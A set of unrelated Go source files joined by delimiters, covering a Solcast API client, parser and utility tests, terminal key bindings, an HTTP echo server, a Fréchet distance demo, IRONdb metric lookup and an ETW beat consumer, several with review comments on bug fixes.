		log.Printf("Unable to create HTTP client %v", whereami.WhereAmI())
		panic(err)
	}
	// close the body on every path (the original leaked it on 4xx/5xx)
	defer resp.Body.Close()
	if resp.StatusCode >= 500 && resp.StatusCode < 600 {
		// BUG fixed: the original called panic(err) here, but err is always
		// nil once Get succeeds — it panicked with no context.
		log.Printf("Solcast API error, post to GitHub or here https://forums.solcast.com.au/ please %v", whereami.WhereAmI())
		return []byte{}, errors.Errorf("solcast API server error: HTTP %d", resp.StatusCode)
	}
	if resp.StatusCode >= 400 && resp.StatusCode < 500 {
		if resp.StatusCode == 429 {
			limits := getApiRateLimits(resp)
			log.Printf("Request rate limit exceeded please wait and try again %v %v", limits, whereami.WhereAmI())
			// was errors.New(fmt.Sprintf(...)) — Errorf is the direct form
			return []byte{}, errors.Errorf("Retry request at %v", limits.ResetTime)
		}
		// BUG fixed: this branch also panicked with a nil err
		log.Printf("Bad request, check your inputs %v", whereami.WhereAmI())
		return []byte{}, errors.Errorf("bad request: HTTP %d", resp.StatusCode)
	}
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		log.Printf("Failure to read the HTTP body %v", whereami.WhereAmI())
		panic(err)
	}
	return body, nil
}
// powerEstimatedActuals calls the /pv_power/estimated_actuals endpoint for
// the given location/capacity and decodes the JSON response. It panics on
// request or decode failure, matching the other fetch helpers in this file.
func powerEstimatedActuals(location datatypes.PowerLatLng, config Config) datatypes.PowerEstimatedActualsResponse {
results := datatypes.PowerEstimatedActualsResponse{}
queryParams := &datatypes.PowerQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
Capacity: location.Capacity,
}
// query.Values encodes the struct into URL query parameters
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/pv_power/estimated_actuals?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
// PowerEstimatedActualsWithKey fetches power estimated actuals using an
// explicit API key instead of the configured one.
func PowerEstimatedActualsWithKey(location datatypes.PowerLatLng, apiKey string) datatypes.PowerEstimatedActualsResponse {
	cfg := Read()
	cfg.APIKey = apiKey
	return powerEstimatedActuals(location, cfg)
}
// PowerEstimatedActuals fetches power estimated actuals with the configured API key.
func PowerEstimatedActuals(location datatypes.PowerLatLng) datatypes.PowerEstimatedActualsResponse {
	cfg := Read()
	return powerEstimatedActuals(location, cfg)
}
// radiationEstimatedActuals calls the /radiation/estimated_actuals endpoint
// for the given location and decodes the JSON response. It panics on request
// or decode failure, matching the other fetch helpers in this file.
func radiationEstimatedActuals(location datatypes.LatLng, config Config) datatypes.RadiationEstimatedActualsResponse {
results := datatypes.RadiationEstimatedActualsResponse{}
queryParams := &datatypes.RadiationQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
}
// query.Values encodes the struct into URL query parameters
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/radiation/estimated_actuals?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
// RadiationEstimatedActualsWithKey fetches radiation estimated actuals using
// an explicit API key instead of the configured one.
func RadiationEstimatedActualsWithKey(location datatypes.LatLng, apiKey string) datatypes.RadiationEstimatedActualsResponse {
	cfg := Read()
	cfg.APIKey = apiKey
	return radiationEstimatedActuals(location, cfg)
}
// RadiationEstimatedActuals fetches radiation estimated actuals with the configured API key.
func RadiationEstimatedActuals(location datatypes.LatLng) datatypes.RadiationEstimatedActualsResponse {
	cfg := Read()
	return radiationEstimatedActuals(location, cfg)
}
// powerForecast calls the /pv_power/forecasts endpoint for the given
// location/capacity and decodes the JSON response. It panics on request or
// decode failure, matching the other fetch helpers in this file.
func powerForecast(location datatypes.PowerLatLng, config Config) datatypes.PowerForecastsResponse {
results := datatypes.PowerForecastsResponse{}
queryParams := &datatypes.PowerQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
Capacity: location.Capacity,
}
// query.Values encodes the struct into URL query parameters
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/pv_power/forecasts?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
// PowerForecast fetches power forecasts with the configured API key.
func PowerForecast(location datatypes.PowerLatLng) datatypes.PowerForecastsResponse {
	cfg := Read()
	return powerForecast(location, cfg)
}
// PowerForecastWithKey fetches power forecasts using an explicit API key
// instead of the configured one.
func PowerForecastWithKey(location datatypes.PowerLatLng, apiKey string) datatypes.PowerForecastsResponse {
	cfg := Read()
	cfg.APIKey = apiKey
	return powerForecast(location, cfg)
}
// radiationForecast calls the /radiation/forecasts endpoint for the given
// location and decodes the JSON response. It panics on request or decode
// failure, matching the other fetch helpers in this file.
func radiationForecast(location datatypes.LatLng, config Config) datatypes.RadiationForecastsResponse {
results := datatypes.RadiationForecastsResponse{}
queryParams := &datatypes.RadiationQueryParams{
Format: "json",
Latitude: toString(location.Latitude, 6),
Longitude: toString(location.Longitude, 6),
APIKey: config.APIKey,
}
// query.Values encodes the struct into URL query parameters
v, _ := query.Values(queryParams)
url := fmt.Sprintf("%v/radiation/forecasts?%v", config.Url, v.Encode())
data, err := getData(url)
if err != nil {
log.Printf("HTTP request failed to %v %v", err, whereami.WhereAmI())
panic(err)
}
if err := json.Unmarshal(data, &results); err != nil {
log.Printf("Failure to parse HTTP response body to %v", whereami.WhereAmI())
panic(err)
}
return results
}
// RadiationForecastWithKey fetches radiation forecasts using an explicit API
// key instead of the configured one.
func RadiationForecastWithKey(location datatypes.LatLng, apiKey string) datatypes.RadiationForecastsResponse {
	cfg := Read()
	cfg.APIKey = apiKey
	return radiationForecast(location, cfg)
}
// RadiationForecast fetches radiation forecasts with the configured API key.
func RadiationForecast(location datatypes.LatLng) datatypes.RadiationForecastsResponse {
	cfg := Read()
	return radiationForecast(location, cfg)
}
// batchRadiationForecast feeds every location through a worker pool sized to
// the CPU count and collects the radiation forecast for each.
func batchRadiationForecast(locations []datatypes.LatLng, config Config) []datatypes.RadiationForecastsResponse {
	var wg sync.WaitGroup
	toDo := len(locations)
	workersAmount := runtime.NumCPU()
	pool := workerpool.New(workersAmount)
	out := make(chan datatypes.LatLng, toDo)
	pool.Start(workersAmount, func(location datatypes.LatLng) {
		defer wg.Done()
		out <- location
	})
	// BUG fixed: the worker calls Done once per delegated job, so the
	// WaitGroup must count jobs (toDo), not workers — the original added
	// workersAmount, which panics or closes the channel early whenever
	// len(locations) != NumCPU.
	wg.Add(toDo)
	for i := 0; i < toDo; i++ {
		// BUG fixed: the original delegated the loop index i; the worker
		// expects a datatypes.LatLng, so the actual location is passed now.
		pool.Delegate(locations[i])
	}
	go func() {
		// stop all workers after the jobs are done
		wg.Wait()
		close(out)
		pool.Stop()
	}()
	var results []datatypes.RadiationForecastsResponse
	for location := range out {
		results = append(results, radiationForecast(location, config))
	}
	return results
}
// BatchRadiationForecast fetches radiation forecasts for all locations with
// the configured API key.
func BatchRadiationForecast(locations []datatypes.LatLng) []datatypes.RadiationForecastsResponse {
	cfg := Read()
	return batchRadiationForecast(locations, cfg)
}
// BatchRadiationForecastWithKey fetches radiation forecasts for all locations
// using an explicit API key instead of the configured one.
func BatchRadiationForecastWithKey(locations []datatypes.LatLng, apiKey string) []datatypes.RadiationForecastsResponse {
	cfg := Read()
	cfg.APIKey = apiKey
	return batchRadiationForecast(locations, cfg)
}
// batchPowerForecast fetches the power forecast for each location in order.
// The original was an unimplemented stub that always returned nil; this
// implements it sequentially (parallelizing like batchRadiationForecast can
// follow once that helper's pool is factored out).
func batchPowerForecast(locations []datatypes.PowerLatLng, config Config) []datatypes.PowerForecastsResponse {
	var results []datatypes.PowerForecastsResponse
	for _, location := range locations {
		results = append(results, powerForecast(location, config))
	}
	return results
}
// BatchPowerForecast fetches power forecasts for all locations with the
// configured API key.
func BatchPowerForecast(locations []datatypes.PowerLatLng) []datatypes.PowerForecastsResponse {
	cfg := Read()
	return batchPowerForecast(locations, cfg)
}
func BatchPowerForecastWithKey(locations[] datatypes.PowerLatLng, apiKey string) []datatypes.PowerForecastsResponse {
config := Read()
config.APIKey = apiKey
return batchPowerForecast(locations, config)
} |
package constant
// Configuration keys used to look up spider settings.
const SPIDE_URL string = "go.config.url"
const SPIDE_KEYWORD string = "go.config.keyword"
const SPIDE_PAGE_SIZE string = "go.config.pageSize"
const SPIDE_SAVE_PATH string = "go.config.savePath"
// main is an empty placeholder.
// NOTE(review): the package is named "constant" yet declares func main —
// confirm whether this file belongs in package main or main should be removed.
func main() {
}
|
package coredb
import (
"testing"
"go.uber.org/zap/zapcore"
jarvisbase "github.com/zhs007/jarviscore/base"
)
// TestBackup06 opens a v0.6 backup database and verifies the stored private
// key address and the node count. (The redundant `return` statements after
// t.Fatalf were removed — Fatalf already stops the test via FailNow.)
func TestBackup06(t *testing.T) {
	jarvisbase.InitLogger(zapcore.DebugLevel, true, "", "")
	// initialize CoreDB from the backup fixture
	cdb, err := NewCoreDB("../test/backup-v0.6", "", "leveldb", nil)
	if err != nil {
		t.Fatalf("TestBackup06 NewCoreDB err! %v", err)
	}
	if err := cdb.Init(); err != nil {
		t.Fatalf("TestBackup06 Init err! %v", err)
	}
	if cdb.GetPrivateKey().ToAddress() != "13VHbRCxFsiFk6qmVZjkDGXHzEJ553yMHd" {
		t.Fatalf("TestBackup06 GetPrivateKey err! (%v - %v)", cdb.GetPrivateKey().ToAddress(), "13VHbRCxFsiFk6qmVZjkDGXHzEJ553yMHd")
	}
	numsNode := cdb.CountNodeNums()
	if numsNode != 30 {
		t.Fatalf("TestBackup06 CountNodeNums err! (%v - %v)", numsNode, 30)
	}
	t.Logf("TestBackup06 is OK")
}
|
package main
import (
"bufio"
"strings"
"testing"
"github.com/stretchr/testify/assert"
)
// message is a sample DSMR P1 telegram used as a test fixture for the parser.
var message = `/KFM5KAIFA-METER
1-3:0.2.8(42)
0-0:1.0.0(160525205154S)
0-0:96.1.1(1234567890)
1-0:1.8.1(000001.117*kWh)
1-0:1.8.2(000004.491*kWh)
1-0:2.8.1(000000.000*kWh)
1-0:2.8.2(000000.000*kWh)
0-0:96.14.0(0002)
1-0:1.7.0(00.563*kW)
1-0:2.7.0(00.000*kW)
0-0:96.7.21(00001)
0-0:96.7.9(00001)
1-0:99.97.0(1)(0-0:96.7.19)(000101000001W)(2147483647*s)
1-0:32.32.0(00000)
1-0:32.36.0(00000)
0-0:96.13.1()
0-0:96.13.0()
1-0:31.7.0(004*A)
1-0:21.7.0(00.563*kW)
1-0:22.7.0(00.000*kW)
0-1:24.1.0(003)
0-1:96.1.0(4730303139333430323839323633363136)
0-1:24.2.1(160525200000S)(00000.866*m3)
!D57B`
// TestTelegram parses the fixture telegram and checks the decoded fields.
func TestTelegram(t *testing.T) {
telegram := &Telegram{}
// NOTE(review): the UnmarshalBinary result is discarded — if it returns an
// error, the test should fail on it rather than asserting on a zero struct.
telegram.UnmarshalBinary([]byte(message))
// NOTE(review): testify's convention is assert.Equal(t, expected, actual);
// these calls pass actual first, which only affects failure messages.
assert.Equal(t, telegram.EquipmentId, 1234567890, "")
assert.Equal(t, telegram.PowerUsedLowTariff, 1.117, "")
assert.Equal(t, telegram.PowerUsedNormalTariff, 4.491, "")
assert.Equal(t, telegram.CurrentPowerUsage, 0.563, "")
assert.Equal(t, telegram.GasUsed, 0.866, "")
}
// TestSplitTelegram verifies that SplitTelegram tokenizes a stream on '!'.
func TestSplitTelegram(t *testing.T) {
	scanner := bufio.NewScanner(strings.NewReader("a!b!c"))
	scanner.Split(SplitTelegram)
	got := []string{}
	for scanner.Scan() {
		got = append(got, scanner.Text())
	}
	assert.Equal(t, got, []string{"a", "b", "c"}, "")
}
|
/*
Copyright 2022 The KubeVela Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package model
import (
"sort"
"github.com/gdamore/tcell/v2"
)
// KeyAction is key action struct
type KeyAction struct {
// Description is the human-readable label shown in menu hints
Description string
// Action handles the key event; it may return a replacement event
Action func(*tcell.EventKey) *tcell.EventKey
// Visible and Shared are display/ownership flags carried with the action
Visible bool
Shared bool
}
// KeyActions is a map from key to action
type KeyActions map[tcell.Key]KeyAction
// Hint converts the key action map into menu hints, ordered by key code and
// limited to keys that have a known name.
func (ka KeyActions) Hint() []MenuHint {
	keys := make([]int, 0, len(ka))
	for k := range ka {
		keys = append(keys, int(k))
	}
	sort.Ints(keys)
	hints := make([]MenuHint, 0, len(keys))
	for _, k := range keys {
		name, ok := tcell.KeyNames[tcell.Key(k)]
		if !ok {
			continue
		}
		hints = append(hints, MenuHint{
			Key:         name,
			Description: ka[tcell.Key(k)].Description,
		})
	}
	return hints
}
// Add merges every binding from actions into ka, overwriting existing keys.
func (ka KeyActions) Add(actions KeyActions) {
	for key, action := range actions {
		ka[key] = action
	}
}
// Set copies the given bindings into ka (same semantics as Add).
func (ka KeyActions) Set(actions KeyActions) {
	for key, act := range actions {
		ka[key] = act
	}
}
// Delete removes each listed key from ka; missing keys are no-ops.
func (ka KeyActions) Delete(kk []tcell.Key) {
	for _, key := range kk {
		delete(ka, key)
	}
}
// Clear empties ka in place, keeping the map usable afterwards.
func (ka KeyActions) Clear() {
	for key := range ka {
		delete(ka, key)
	}
}
|
/*
Create a user defined struct with the identifier “person” the fields:
first
last
age
attach a method to type person with
the identifier “speak”
the method should have the person say their name and age
create a value of type person
call the method from the value of type person
*/
package main
import "fmt"
// person is a simple value type for the exercise: a named individual
// with an age.
type person struct {
	first string // given name
	last string // family name
	age int // age in years
}
// speak prints a one-line self-introduction with the full name and age.
func (p person) speak() {
	fullName := p.first + " " + p.last
	fmt.Printf("Hi, my name is %v and I am %v years old\n", fullName, p.age)
}
// main constructs a sample person and has it introduce itself.
func main() {
	wizard := person{
		first: "Great",
		last:  "Sorcerer",
		age:   641,
	}
	wizard.speak()
}
|
package main
import (
"encoding/json"
"io/ioutil"
"net/http"
"os"
"strings"
)
// request is the JSON shape echoed back to the client: a snapshot of the
// incoming HTTP request plus selected environment variables.
type request struct {
	URL string `json:"url"`
	Method string `json:"method"`
	Headers http.Header `json:"headers"`
	Environ []string `json:"environ"`
	// Body is the raw request body; note []byte marshals as base64 in JSON.
	Body []byte `json:"body"`
}
// EnvPrefix marks environment variables that should be exposed to clients.
const EnvPrefix = "ECHO_"

// environ returns every process environment entry starting with EnvPrefix,
// with the prefix stripped. Always returns a non-nil slice.
func environ() []string {
	env := make([]string, 0)
	for _, entry := range os.Environ() {
		if !strings.HasPrefix(entry, EnvPrefix) {
			continue
		}
		env = append(env, strings.TrimPrefix(entry, EnvPrefix))
	}
	return env
}
// handle echoes the incoming request (method, URL, headers, filtered env,
// raw body) back to the caller as a JSON document.
func handle(rw http.ResponseWriter, r *http.Request) {
	rr := &request{
		Method:  r.Method,
		Headers: r.Header,
		URL:     r.URL.String(),
		Environ: environ(),
	}
	body, err := ioutil.ReadAll(r.Body)
	if err != nil {
		http.Error(rw, err.Error(), http.StatusInternalServerError)
		return
	}
	rr.Body = body
	payload, err := json.Marshal(rr)
	if err != nil {
		http.Error(rw, err.Error(), http.StatusInternalServerError)
		return
	}
	rw.Header().Set("Content-Type", "application/json")
	rw.Write(payload)
}
// main serves the echo handler on every path at :8000.
func main() {
	http.HandleFunc("/", handle)
	// NOTE(review): ListenAndServe's error is discarded — a startup failure
	// (e.g. port in use) exits silently; consider logging it.
	http.ListenAndServe(":8000", nil)
}
|
package main
import (
fretchet "github.com/artpar/frechet/frechet"
// "fmt"
"fmt"
)
// main computes the Fréchet distance between two fixed 2D curves under
// several polyhedral metrics and prints each result.
// Fixes: removed non-idiomatic trailing semicolons (gofmt) and corrected
// comments that described the wrong dimensionality/parameters.
func main() {
	var frechet fretchet.FrechetDistance
	var curveA, curveB [][]float64
	var dist float64

	// Two sampled curves in 2D.
	curveA = [][]float64{[]float64{0, -497.75619757841895}, []float64{559.4405594405595, -592.7969328517269}, []float64{1153.8461538461538, -746.6108377369661}, []float64{1748.2517482517483, -909.9922089511371}, []float64{2342.6573426573427, -1000}, []float64{2937.062937062937, -949.8966475584696}, []float64{3531.4685314685316, -719.3743228266028}, []float64{4090.909090909091, -439.86293936085747}, []float64{4685.314685314685, -227.8895214941}, []float64{5279.72027972028, -109.157671952481}, []float64{5874.125874125874, -42.826627522605804}, []float64{6468.531468531469, -8.021665145351108}, []float64{7062.937062937063, 77.1438213019494}, []float64{7622.377622377623, 264.29833021335367}, []float64{8216.783216783217, 533.4807776278296}, []float64{8811.188811188811, 866.6588667982098}, []float64{9405.594405594406, 1000}, []float64{10000, 790.0316097458776}}
	curveB = [][]float64{[]float64{0, -695.1611497647639}, []float64{544.8717948717949, -790.4777475298525}, []float64{1089.7435897435898, -892.1572902869895}, []float64{1634.6153846153845, -958.3213539384153}, []float64{2179.4871794871797, -1000}, []float64{2724.358974358974, -960.1329406719366}, []float64{3269.230769230769, -826.0042769490638}, []float64{3782.051282051282, -602.0035693135744}, []float64{4326.923076923077, -413.717890336045}, []float64{4871.794871794872, -299.96868420084854}, []float64{5416.666666666667, -253.97993813506912}, []float64{5961.538461538462, -217.38757274473835}, []float64{6506.410256410257, -175.92754425757016}, []float64{7051.282051282051, -70.35247519388975}, []float64{7564.102564102564, 104.99846910576912}, []float64{8108.974358974359, 345.94199721600626}, []float64{8653.846153846154, 684.4321262067106}, []float64{9198.71794871795, 983.762187449438}, []float64{9743.589743589744, 999.9999999999998}, []float64{10000, 699.4095383377385}}

	// L-1 metric in 2 dimensions.
	frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.L1(2))
	dist = frechet.ComputeDistance(curveA, curveB)
	fmt.Printf("Distance 1 : %f\n\n\n\n\n", dist)

	// L-infinity metric in 2 dimensions.
	frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.LInfinity(2))
	dist = frechet.ComputeDistance(curveA, curveB)
	fmt.Printf("Distance 2 : %f\n\n\n\n\n", dist)

	// 1.009-approximation of Euclidean in 2D
	// (NB: any value above sqrt(2) uses sqrt(2) as approximation value).
	frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.EpsApproximation2D(1.009))
	dist = frechet.ComputeDistance(curveA, curveB)
	fmt.Printf("Distance 3 : %f\n\n\n\n\n", dist)

	// 8-regular polygon in 2D; the implementation supports only symmetric
	// polyhedra, so the parameter must be even.
	frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.KRegular2D(8))
	dist = frechet.ComputeDistance(curveA, curveB)
	fmt.Printf("Distance 4 : %f\n", dist)
}
//
//func main() {
// var frechet fretchet.FrechetDistance;
// var curveA, curveB [][]float64;
// var dist float64;
//
// // two curves in 3D
// curveA = [][]float64{[]float64{0, 0, 0}, []float64{1, 1, 0}, []float64{0, 1, 2}, []float64{2, 1, 2}};
// curveB = [][]float64{[]float64{0, 0, 0}, []float64{2, 1, 2}};
//
// // L-1 in 3 dimensions
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.L1(3));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 1 : %f\n\n\n\n\n", dist)
// // two curves in 4D
// curveA = [][]float64{[]float64{0, 0, 0, -3}, []float64{1, 1, 6, 5}, []float64{0, 8, 2, -2}};
// curveB = [][]float64{[]float64{0, 0, 0, 1}, []float64{2, 1, 2, 7}};
//
// // L-infinity in 4 dimensions
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.LInfinity(4));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 2 : %f\n\n\n\n\n", dist)
//
// // two curves in 2D
// curveA = [][]float64{[]float64{0, 0}, []float64{1, 6}, []float64{0, 8}};
// curveB = [][]float64{[]float64{1, 0}, []float64{2, 7}, []float64{-1, 5}};
//
// // 1.1-approximation of Euclidean (in 2 dimensions) (NB: any value above sqrt(2) uses sqrt(2) as approximation value)
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.EpsApproximation2D(1.1));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 3 : %f\n\n\n\n\n", dist)
//
// // 6-regular polygon (in 2 dimensions)
// // implementation supports only symmetric polyhedra, so parameter must be even!
// frechet = fretchet.NewPolyhedralFretchetDistance(fretchet.KRegular2D(6));
// dist = frechet.ComputeDistance(curveA, curveB);
// fmt.Printf("Distance 4 : %f\n", dist)
//}
//
|
// testadd project doc.go
/*
testadd document
*/
package main
|
package utils
import (
"fmt"
"testing"
)
// TestRandom is an empty placeholder; no assertions yet.
func TestRandom(t *testing.T) {
}
// TestGetUniqueId logs one generated id; it is a smoke test with no
// assertions (uniqueness is not actually verified).
func TestGetUniqueId(t *testing.T) {
	t.Logf("id: %v", GetUniqueId())
}
// TestRandString logs ten random 32-character strings and their lengths.
// Fix: generate once per round so the logged string and the logged length
// refer to the same value (the original called RandString twice per round,
// logging the length of a different string than the one printed).
func TestRandString(t *testing.T) {
	for i := 1; i <= 10; i++ {
		s := RandString(32)
		t.Logf("str: %v", s)
		t.Logf("len: %v", len(s))
	}
}
// TestRemoveRepeatedElement runs the map-based dedup helper over a slice
// with many repeats and logs the result (no assertions).
func TestRemoveRepeatedElement(t *testing.T) {
	input := []int64{1, 3, 4, 4, 2, 2, 5, 21, 3, 12, 3, 87, 123, 123, 1, 3, 5, 1, 123, 123}
	//a := DistinctSliceOnIt64(n)
	//delRepeatElem(n)
	deduped := removeDuplication_map(input)
	t.Logf("a:%v", deduped)
}
// delRepeatElem collapses runs of equal adjacent elements in nums in place
// and returns the resulting length. Non-adjacent duplicates survive (sort
// first for a full dedup). The caller's slice header keeps its original
// length; only the first returned-length elements are meaningful.
// Fixes: (1) after deleting nums[i] the index is rewound so runs of three
// or more equal elements are fully collapsed (the original skipped every
// other duplicate); (2) no longer panics on an empty slice.
func delRepeatElem(nums []int64) int {
	if len(nums) == 0 {
		return 0
	}
	fmt.Println(nums, &nums[0])
	for i := 0; i < len(nums)-1; i++ {
		if nums[i]^nums[i+1] == 0 { // equal neighbours XOR to zero
			nums = append(nums[:i], nums[i+1:]...) // drop one copy
			i-- // re-examine this index: the next element shifted into it
		}
	}
	fmt.Println(nums, &nums[0])
	return len(nums)
}
// TestSort selection-sorts a fixed slice ascending and logs the result
// (no assertions).
func TestSort(t *testing.T) {
	nums := []int64{4, 3, 3, 15, 131, 1, 5, 3, 6, 4, 57, 9, 31, 23, 25}
	for i := 0; i < len(nums)-1; i++ {
		smallest := i
		for j := i + 1; j < len(nums); j++ {
			if nums[j] < nums[smallest] {
				smallest = j
			}
		}
		nums[i], nums[smallest] = nums[smallest], nums[i]
	}
	t.Logf("sli: %v", nums)
}
// removeDuplication_map deduplicates arr in place using a set, preserving
// first-seen order, and returns the shortened slice (which aliases arr's
// backing array).
func removeDuplication_map(arr []int64) []int64 {
	seen := make(map[int64]struct{}, len(arr))
	out := arr[:0]
	for _, v := range arr {
		if _, dup := seen[v]; dup {
			continue
		}
		seen[v] = struct{}{}
		out = append(out, v)
	}
	return out
}
|
package main
import "fmt"
// iota counts up from 0 within a const block: a=0, b=1, c=2, d=3.
const (
	a = iota
	b
	c
	d
)
func main() {
const e = iota
fmt.Println(a)
fmt.Println(b)
fmt.Println(c)
fmt.Println(d)
fmt.Println(e)
}
|
package gosnowth
import (
"context"
"fmt"
"path"
)
// LocateMetric returns a list of nodes owning the specified metric.
// With an explicit node the lookup is delegated to that node; otherwise the
// locally cached topology is consulted.
func (sc *SnowthClient) LocateMetric(uuid string, metric string,
	node ...*SnowthNode,
) ([]TopologyNode, error) {
	if len(node) != 0 {
		return sc.LocateMetricRemote(uuid, metric, node[0])
	}
	topology, err := sc.Topology()
	if err != nil {
		return nil, err
	}
	return topology.FindMetric(uuid, metric)
}
// LocateMetricContext is the context aware version of LocateMetric.
// NOTE(review): ctx is only honored on the remote path; the local
// sc.Topology() lookup ignores it — confirm whether a context-aware
// topology accessor exists and should be used here.
func (sc *SnowthClient) LocateMetricContext(ctx context.Context, uuid string,
	metric string, node ...*SnowthNode,
) ([]TopologyNode, error) {
	if len(node) > 0 {
		return sc.LocateMetricRemoteContext(ctx, uuid, metric, node[0])
	}
	topo, err := sc.Topology()
	if err != nil {
		return nil, err
	}
	return topo.FindMetric(uuid, metric)
}
// LocateMetricRemote locates which nodes contain specified metric data.
// It is a convenience wrapper around LocateMetricRemoteContext with a
// background context.
func (sc *SnowthClient) LocateMetricRemote(uuid string, metric string,
	node *SnowthNode,
) ([]TopologyNode, error) {
	return sc.LocateMetricRemoteContext(context.Background(),
		uuid, metric, node)
}
// LocateMetricRemoteContext is the context aware version of LocateMetricRemote.
// It asks a node (the given one, or the first active node) for the topology
// entry of the metric via GET /locate/xml/<uuid>/<metric> and returns the
// owning nodes.
func (sc *SnowthClient) LocateMetricRemoteContext(ctx context.Context,
	uuid string, metric string, node *SnowthNode,
) ([]TopologyNode, error) {
	r := &Topology{}
	// Fall back to any active node when the caller did not pin one.
	if node == nil {
		nodes := sc.ListActiveNodes()
		if len(nodes) == 0 {
			return nil, fmt.Errorf("no active nodes")
		}
		node = nodes[0]
	}
	body, _, err := sc.DoRequestContext(ctx, node, "GET",
		path.Join("/locate/xml", uuid, metric), nil, nil)
	if err != nil {
		return nil, err
	}
	// NOTE(review): &r is a **Topology here (r is already a pointer) —
	// presumably decodeXML expects that; confirm against its signature.
	if err := decodeXML(body, &r); err != nil {
		return nil, fmt.Errorf("unable to decode IRONdb response: %w", err)
	}
	// Normalize the write-copies fields so both carry the effective value,
	// whichever of the old/new response fields was populated.
	if r.WriteCopies == 0 {
		r.WriteCopies = r.OldWriteCopies
	}
	r.OldWriteCopies = r.WriteCopies
	return r.Nodes, nil
}
|
package main
import (
"net/http"
"strings"
"text/template"
//"path"
//"github.com/op/go-logging"
)
var (
//log = logging.MustGetLogger("main")
)
// playHandler serves the "play" page template for files under root.
type playHandler struct {
	root string // filesystem root the play paths are resolved against
	tmpl string // asset name of the HTML template to render
}

// playServer returns an http.Handler that renders the play template.
func playServer(root, template string) http.Handler {
	return &playHandler{root, template}
}
// ServeHTTP renders the play template for the requested file, passing the
// path relative to the play root and the Referer URL to the template.
// Fixes: the Asset and template-parse errors were ignored — a parse failure
// left a broken template and a possible nil dereference at Execute; both
// paths now log and return a 500. The Execute error is logged as well.
func (u *playHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	dir := strings.TrimPrefix(r.URL.Path, cfgRoot+"/play/")
	html, err := Asset(u.tmpl)
	if err != nil {
		log.Warning("error %s", err)
		http.Error(w, "template asset not found", http.StatusInternalServerError)
		return
	}
	funcMap := template.FuncMap{
		/*
			"humanizeBytes": humanizeBytes,
			"humanizeTime":  humanizeTime,
			"isZip":         isZip,
		*/
	}
	t, err := template.New("").Funcs(funcMap).Parse(string(html))
	if err != nil {
		// Bail out: executing a nil/broken template below would panic.
		log.Warning("error %s", err)
		http.Error(w, "template error", http.StatusInternalServerError)
		return
	}
	url := r.Header.Get("Referer")
	if err := t.Execute(w, struct {
		FileMP3 string
		Referer string
	}{
		dir,
		url,
	}); err != nil {
		log.Warning("error %s", err)
	}
}
|
package etw
import (
"github.com/narph/etwbeat/config"
"github.com/pkg/errors"
"github.com/elastic/beats/v7/libbeat/beat"
"github.com/elastic/beats/v7/libbeat/common"
"github.com/elastic/beats/v7/libbeat/common/fmtstr"
"github.com/elastic/beats/v7/libbeat/logp"
"github.com/elastic/beats/v7/libbeat/processors"
)
// Windows ETW API constants. Names and values mirror the Win32 SDK headers,
// hence the C-style ALL_CAPS naming (kept intentionally for 1:1 mapping).
const (
	EVENT_TRACE_CONTROL_STOP = 1
	EVENT_CONTROL_CODE_DISABLE_PROVIDER = 0
	EVENT_CONTROL_CODE_ENABLE_PROVIDER = 1
	PROCESS_TRACE_MODE_REAL_TIME = 0x00000100
	PROCESS_TRACE_MODE_RAW_TIMESTAMP = 0x00001000
	PROCESS_TRACE_MODE_EVENT_RECORD = 0x10000000
	EVENT_HEADER_FLAG_STRING_ONLY = 0x0004
	EVENT_HEADER_PROPERTY_XML = 0x0001
)
// Consumer consumes ETW events from a trace session and publishes them to
// the beat pipeline.
type Consumer struct {
	log *logp.Logger // component logger
	Config consumerConfig // unpacked consumer configuration
	eventMeta common.EventMetadata // fields/tags added to every event
	processors beat.ProcessorList // processor chain applied before publish
	client beat.Client // pipeline client; set in Run
}

// consumerConfig holds the user-facing configuration for a Consumer.
type consumerConfig struct {
	common.EventMetadata `config:",inline"` // Fields and tags to add to events.
	Processors processors.PluginConfig `config:"processors"`
	Index fmtstr.EventFormatString `config:"index"`
}
// NewConsumer unpacks the raw options into a consumerConfig, builds the
// processor chain for it, and returns the assembled Consumer.
func NewConsumer(options *common.Config, beatInfo beat.Info) (*Consumer, error) {
	cfg := consumerConfig{}
	if err := options.Unpack(&cfg); err != nil {
		return nil, err
	}
